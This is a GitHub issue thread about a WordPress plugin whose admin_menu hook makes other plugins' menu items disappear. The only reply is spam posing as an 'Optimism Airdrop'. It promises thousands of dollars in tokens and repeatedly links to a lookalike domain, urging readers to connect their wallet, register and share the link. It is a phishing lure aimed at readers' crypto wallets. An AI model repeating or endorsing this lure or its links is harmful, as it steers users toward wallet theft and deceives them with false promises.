### ISSUE TITLE
An issue with menu

### ISSUE THREAD

**Issue by abilicom** [garyblankenship/auto-tags#1]
This plugin (as it does also in the original plugin on wordpress.org) has a problem with how it hooks into the WordPress 
add_action('admin_menu', array($this, 'display_menu'));
It makes the next item in the admin menu hirearchy disappear for SOME other plugins (in my case, the auto-describe-taxonomies plugin and others, depending on which are activated/deactivated).  But not all plugins.  I've been investigating this all day and have not found the problem.

**Comment by pradip-ee** [comment]
## Congratulations 🪂🔴

Optimism Airdrop: Claim up to $20,000 in Tokens Now!

🔴 LIVE NOW
Round 4 of $OP Rewards in Rainbow
 
→ Earn rewards on bridges to and swaps on Optimism
→ 1305,160 OP 
→ [Rewards airdropped monthly](https://optimisx.fly.dev/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Optimism. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Dydx Exchange](https://pbs.twimg.com/media/F85ZbWmWwAAUZA6?format=jpg&name=4096x4096)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://optimisx.fly.dev/)

Access the Optimism platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://optimisx.fly.dev/)
